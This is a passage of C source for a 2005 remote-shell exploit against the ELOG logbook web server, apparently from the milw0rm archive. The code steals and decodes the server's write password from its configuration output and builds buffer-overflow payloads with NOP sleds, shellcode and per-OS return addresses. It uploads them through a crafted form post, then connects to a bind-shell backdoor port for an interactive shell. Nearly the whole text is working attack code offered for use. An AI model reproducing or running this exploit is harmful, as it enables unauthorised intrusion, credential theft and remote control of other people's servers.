"%s\r\nContent-Disposition: form-data; name=\"Subject\"\r\n\r\n%s\r\n", boundary, subject);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"Text\"\r\n\r\n%s\r\n", boundary, text);
if(include_evilfile){
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"attfile\";filename=\"%s\"\r\n", boundary, att_file);
}
sprintf(content + strlen(content),"%s\r\n", boundary);
content_length = strlen(content);
content[content_length] = '\0';
return(l_content);
}
char *urlencode(char *str)
{
char *p;
char *s = encoded_url;
p = str;
char *encoded = encoded_url;
bzero(encoded_url,sizeof(encoded_url));
if(index(str,' ') == NULL) {
return(str);
}
while(*p && (int) s < (int) encoded_url + 50 ) {
*s = *p;
if(*p == ' '){
*s = '+';
}
s++;
p++;
}
return(encoded);
}
char *make_request_header(char *logbookname,char *glob_boundary,int which)
{
glob_boundary = boundary;
char request[REQUESTSIZE];
char *p = request;
char boun_buf[BOUNSIZE];
char host_name[50];
char *url_enc = urlencode(logbookname);
if(gethostname(host_name,sizeof(host_name)) == -1)
{ perror("gethostname");
exit(EXIT_FAILURE);
}
sprintf(boun_buf,"%s",boundary);
if(which){
PRINTINFO(MSGQUERY,debug);
}
strncpy(request,POSTREQ,sizeof(POSTREQ));
sprintf(request + strlen(request), "%s/",url_enc);
strcat(request,HTTPVER);
sprintf(request + strlen(request), "Content-Type: multipart/form-data; boundary=%s\r\n",glob_boundary);
sprintf(request + strlen(request), "Host: %s\r\n", host_name);
sprintf(request + strlen(request), "User-Agent: ELOG\r\n");
sprintf(request + strlen(request), "Authorization: Basic %s\r\n",encuserandpass);
sprintf(request + strlen(request), "Content-Length: %d\r\n\r\n", content_length);
bzero(encoded_url,sizeof(encoded_url));
return(p);
}
long get_host_ip(char *hname)
{
long ip_add;
struct hostent *h;
if((ip_add = inet_addr(hname)) < 0)
{
h = gethostbyname(hname);
if(h == NULL)
{
fprintf(stderr,"[-]Can not resolve IP address\n");
exit(1);
}
memcpy(&ip_add,h->h_addr,h->h_length);
}
return(ip_add);
}
int check_for_clear_sector(char *hostname,unsigned short port,char *logbook,int flag)
{
struct sockaddr_in rem_addr;
char sendbuf[SENDBUFSIZE];
char *sendbufp;
char getbuf[GETBUFSIZE];
char *reqbuf;
char notfound[100];
int yes;
int total;
int sock;
int flagchoice;
struct timeval w_t;
fd_set read_fd;
int total_fd;
PRINTINFO(MSGSECTOR,debug);
LOGBOOKNOTFOUND(notfound,logbook);
HEAD:
bzero(&w_t,sizeof(w_t));
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
if(flag == 0)
flagchoice = NOTUPLOADME;
else
flagchoice = UPLOADME;
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
{ perror("setsockopt");
close(sock);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
{
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
sendbufp = make_http_content(flagchoice,logbook);
reqbuf = make_request_header(logbook,boundary,0);
strcpy(sendbuf,reqbuf);
strcat(sendbuf,sendbufp);
if( (send(sock,sendbuf,sizeof(sendbuf),0)) < 0 )
{
perror("send");
exit(-1);
close(sock);
}
FD_ZERO(&read_fd);
FD_SET(sock,&read_fd);
if( (total_fd = select(sock + 1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
{
perror("select");
close(sock);
exit(-1);
}
if(FD_ISSET(sock,&read_fd))
{
if( (total = recv(sock,getbuf,sizeof(getbuf),0)) < 1) {
if(errno == EWOULDBLOCK ){
NPRINTINFO(REMDOWN);
PRINTINFO(REMCRASHED,1);
close(sock);
exit(-1);
}
close(sock);
exit(1);
}
if(strstr(getbuf,INVALIDURL)) {
fprintf(stderr,"[-] Invalid URL Bitch, Type the Correct Path\n");
close(sock);
exit(-1);
}
if(strstr(getbuf,AUTHORIZED_DENY)) {
fprintf(stderr,"[-] Type User name and Password for login Bitch\n");
close(sock);
exit(-1);
}
if(strstr(getbuf,notfound)) {
fprintf(stderr,"[-] NO %s LOGBOOK DEFINED BITCH\n",logbook);
close(sock);
exit(-1);
}
if(strstr(getbuf,ASKEDPASS)) {
NPRINTINFO(PASSALERT);
crack_the_code(hostname,port,logbook);
close(sock);
bzero(getbuf,sizeof(getbuf));
goto HEAD;
}
if(strstr(getbuf,ATTOPTERR)) {
PRINTINFO(READOPTION,1);
close(sock);
bzero(getbuf,sizeof(getbuf));
spy_attr_options(hostname,port,logbook);
goto HEAD;
}
if(strstr(getbuf,ATTERR)) {
get_missing_attributes(getbuf,ATTERR,MISSED[globcount].addr);
ATTNOTFOUND(MISSED[globcount].addr);
MAKINGATT (MISSED[globcount].addr);
globcount++;
bzero(getbuf,sizeof(getbuf));
re_check_sector(hostname,port,logbook,flag);
}
if(strstr(getbuf,SECTOR_CLEAR)) {
PRINTINFO(CLEARAREA,1);
close(sock);
do_last_stage(hostname,port,logbook);
we_r_coming(hostname);
}
}
return(1);
}
void get_missing_attributes(char *attbuf, char *errmessage,char *glob_att)
{
int i,j = 0;
char *p,*k;
p = attbuf;
k = glob_att;
bzero(glob_att,sizeof(glob_att));
if(strstr(p,errmessage)){
i = strlen(p) - strlen(strstr(p,ATTERRTAG));
if( *(char *)(p+i) == '<' && *(char *)(p+i+2) == '>' ) {
j = i+3;
for( ; *(char *)(p+j) != '<' && *(char *)(p+j+3) != '>' ; j++ ) {
*k++ = *(char *)(p+j);
}
*k = '\0';
return;
}
}
return;
}
void alloc_all_globalz(void)
{
ZEROGLOB(glob1_att);
ZEROGLOB(glob2_att);
ZEROGLOB(glob3_att);
ZEROGLOB(glob4_att);
ZEROGLOB(glob5_att);
ZEROGLOB(glob6_att);
ZEROGLOB(glob7_att);
ZEROGLOB(glob8_att);
ZEROGLOB(glob9_att);
ZEROGLOB(glob10_att);
}
int is_there_attribute(void)
{
int i = 0;
int j = 0;
for(i = 0; i<10 ; i++) {
if(strlen(MISSED[i].addr))
j++;
}
return(j);
}
void re_check_sector(char *hostname,unsigned short port,char *logbook,int flag)
{
debug++;
if(recount++ >= 10 ){
NPRINTINFO(BIGOPTIONLIST);
exit(1);
}
check_for_clear_sector(hostname,port,logbook,flag);
}
void spy_attr_options(char *hostname,unsigned short port,char *logbook)
{
int soc;
int ready;
int yes = 0;
char request[REQUESTSIZE];
fd_set read_fd;
struct timeval w_t;
struct sockaddr_in rem_addr;
int k,i = 0;
int n = 0;
char response[6900];
char temp[100];
char *p,*z;
bzero(response,sizeof(response));
bzero(temp,sizeof(temp));
make_spy_header(hostname,port,request,logbook);
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0){
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
{ perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
{
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,request,strlen(request),0)) < 0 )
{
perror("send");
exit(-1);
close(soc);
}
FD_CLR(soc,&read_fd);
FD_ZERO(&read_fd);
FD_SET(soc,&read_fd);
if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
{
perror("select read socket");
close(soc);
exit(1);
}
if(FD_ISSET(soc,&read_fd)){
i = recv(soc, response, 100, 0);
if (i < 0) {
perror("Cannot receive response");
exit(1);
}
n = i;
while (i > 0) {
i = recv(soc, response + n, 100, MSG_DONTWAIT);
if (i > 0)
n += i;
if(i <= 0)
break;
}
response[strlen(response)] = '\0';
close(soc);
fflush(stdin);
#define findme(x,y) {sprintf(x,"Options %s =%c",y,0x20);}
for(i = 0 ; MISSED[i].addr != NULL ; i++) {
findme(temp,MISSED[i].addr);
if((p = strstr(response,temp)) != NULL) {
z = TRASH[i].addr;
while( (!iscntrl(*p+1) || isalnum(*p+1))){
*z = *(char *)(p + strlen(temp));
z++;
p++;
}
for(k = 0; TRASH[i].addr[k] ; k++) {
if((TRASH[i].addr[k] == ',') || (TRASH[i].addr[k] == '\n')) {
TRASH[i].addr[k] = '\0';
}
}
bzero(temp,sizeof(temp));
}
}
}
return;
}
void crack_the_code(char *hostname,unsigned short port,char *logbook)
{
int soc;
int ready;
int yes = 0;
char request[REQUESTSIZE];
fd_set read_fd;
struct timeval w_t;
struct sockaddr_in rem_addr;
int i = 0;
int n = 0;
char response[6900];
char wpassbuf[100];
char *z;
char *p = wpassbuf;
char *w = wpassbufenc;
bzero(wpassbuf,sizeof(wpassbuf));
bzero(wpassbufdec,sizeof(wpassbufdec));
make_spy_header(hostname,port,request,logbook);
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
PRINTINFO(GETINGPASS,1);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,request,strlen(request),0)) < 0 ){
perror("send");
exit(-1);
close(soc);
}
FD_CLR(soc,&read_fd);
FD_ZERO(&read_fd);
FD_SET(soc,&read_fd);
if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
perror("select read socket");
close(soc);
exit(1);
}
if(FD_ISSET(soc,&read_fd)){
i = recv(soc, response, 30, 0);
if (i < 0) {
perror("Cannot receive response");
return ;
}
n = i;
while (i > 0) {
i = recv(soc, response + n, 30, MSG_DONTWAIT);
if (i > 0)
n += i;
if(i <= 0)
break;
}
response[strlen(response)] = '\0';
close(soc);
fflush(stdout);
if((z = strstr(response,"Write Password=")) != NULL)
while((*(char *)(z + 15)) != EOF && isgraph(*(char *)(z + 15))) {
if( *(char *)(z + 15) == 'W') {
if(! isascii(*(char *)(z+16)))
break;
}
*p = *(char *)(z + 15);
z++;
p++;
}
else {NPRINTINFO(PASSFAILED); exit(EXIT_FAILURE);}
base64_decode(wpassbuf,wpassbufdec);
strncpy(w,wpassbuf,sizeof(wpassbuf));
for(i = 0; isgraph(wpassbufdec[i]) ; i++)
{ }
wpassbufdec[i] = '\0';
PRINTINFO(PASSSUCCESS,1);
printf(""GREEN"[+]Write Password = "DEFAULT" "GREEN"%s"DEFAULT"\n",wpassbufdec);
}
}
void make_spy_header(char *hostname,short port, char *buf,char *logbook)
{
char *url_enc = urlencode(logbook);
bzero(buf,sizeof(buf));
strncpy(buf,GETREQ,sizeof(GETREQ));
sprintf(buf + strlen(buf), "%s/",url_enc);
sprintf(buf + strlen(buf), "%s",GETREQCMD);
strcat (buf, HTTPVER);
sprintf(buf + strlen(buf), "Host: %s:%d\r\n", hostname,port);
sprintf(buf + strlen(buf), "User-Agent: ELOG\r\n");
sprintf(buf + strlen(buf), "Accept-Language: en-us,en;q=0.5\r\n");
sprintf(buf + strlen(buf), "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
sprintf(buf + strlen(buf), "Accept-Encoding: gzip,deflate\r\n");
sprintf(buf + strlen(buf), "Keep-Alive: 300\r\n");
sprintf(buf + strlen(buf), "Connection: keep-alive\r\n");
sprintf(buf + strlen(buf), "Authorization: Basic %s\r\n\r\n",encuserandpass);
}
void authorize_user(char *user , char *pass)
{
char *p;
char *k;
p = (char *)&userandpass[0];
k = (char *)&encuserandpass[0];
bzero(userandpass,sizeof(userandpass));
bzero(encuserandpass,sizeof(encuserandpass));
sprintf(p,"%s%c",user,':');
sprintf(p + strlen(p) ,"%s",pass);
base64_encode(userandpass,encuserandpass);
}
void build_att_buffer(int choice,int vendor)
{
unsigned int *i;
char *c;
if(choice == 0)
c = lnx_shellcode;
if(choice == 1)
c = bsd_shellcode;
if(choice == 2) {
bzero(windozetext,sizeof(windozetext));
c = win_shellcode;
memset(windozebuf,'Z',sizeof(windozebuf));
memset(windozetext,NOP,sizeof(windozetext));
i = (int *)&windozebuf[242];
*i = TARGETZ[vendor].ret;
strcpy(&windozetext[sizeof(windozetext) -strlen(c)],c);
return;
}
bzero(shbuffer,sizeof(shbuffer));
bzero(bigbuffer,sizeof(bigbuffer));
bzero(debianbuffer,sizeof(debianbuffer));
memset(bigbuffer,NOP,sizeof(bigbuffer));
memset(shbuffer,'A',sizeof(shbuffer));
memset(debianbuffer,'A',sizeof(debianbuffer));
memset(fedorabuf,'B',sizeof(fedorabuf));
strcpy(&bigbuffer[BIGBUFSIZE - strlen(c)],c);
if(vendor == 4) {
i = (int *)&fedorabuf[284];
}
if(vendor == 5 || vendor == 2 ){
i = (int *)&debianbuffer[260];
}
if((vendor != 4) && (vendor != 5) && (vendor != 6) && (vendor != 2)){
i = (int *)&shbuffer[284];
}
*i = TARGETZ[vendor].ret;
return;
}
void do_last_stage(char *hostname,short port,char *logbook)
{
int soc;
int yes = 0;
struct sockaddr_in rem_addr;
char angelform[SENDBUFSIZE];
char *content;
int flagz = UPLOADME;
bzero(angelform,sizeof(angelform));
content = make_http_content(flagz,logbook);
strcat(angelform,make_request_header(logbook,boundary,0));
strcat(angelform,content);
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,angelform,strlen(angelform),0)) < 0 ){
perror("send");
exit(-1);
close(soc);
}
close(soc);
return;
}
void we_r_coming(char* hostname)
{
int sock;
int yes;
short port;
struct sockaddr_in rem_addr;
port = BACKDOOR;
if(id == 6){
port = WINBACKDOOR;
}
if(id == 2 || id == 10 || id == 11){
port = BSDBACKDOOR;
}
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
perror("setsockopt");
close(sock);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
sleep(4);
if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
NPRINTINFO(REMCRASHED);
close(sock);
exit(1);
}
shell(sock);
exit(0);
}
void shell(int sock)
{
fd_set fd_read;
char buffer[1024],*cmd = (id == 6 ? WINCMD : COMMAND);
int size;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read)) {
if((size = recv(sock, buffer, sizeof(buffer), 0)) < 0){
NPRINTINFO(NODATA);
exit(1);
}
if (write(1, buffer, size) < 0) break;
}
if (FD_ISSET(0, &fd_read)) {
if((size = read(0, buffer, sizeof(buffer))) < 0){
NPRINTINFO(NODATA);
exit(1);
}
if (send(sock, buffer, size, 0) < 0) break;
}
usleep(30);
}
NPRINTINFO(REMDOWN);
exit(0);
}
void banner(void)
{
puts(""GREEN"n4rk0tix(4DDICT3DZ)"DEFAULT" *nix/Windows Elog E.L remote $hell exploit\n");
return;
}
void usage(char * arg)
{
fprintf(stderr,"Usage :%s -h hostname\n"
" \t\t\t -p port\n"
" \t\t\t -l logbookname\n"
" \t\t\t -o Operating System ID\n"
" \t\t\t -d List Operating system ID\n"
" \t\t\t -u logbook user for read(If required)\n"
" \t\t\t -r logbook password for read (If required)\n"
" \t\t\t -w logbook password for write(If required)\n",arg
);
return;
}
void listos(void)
{
int i;
for(i = 0; TARGETZ[i].id != -1 ; i++)
{
printf("%d = %s\n",i,TARGETZ[i].distro);
}
return;
}
/* Vert3k, hic bir zaman senin inandigina inanmadim, koda tapan ben deilim*/
// milw0rm.com [2005-02-09]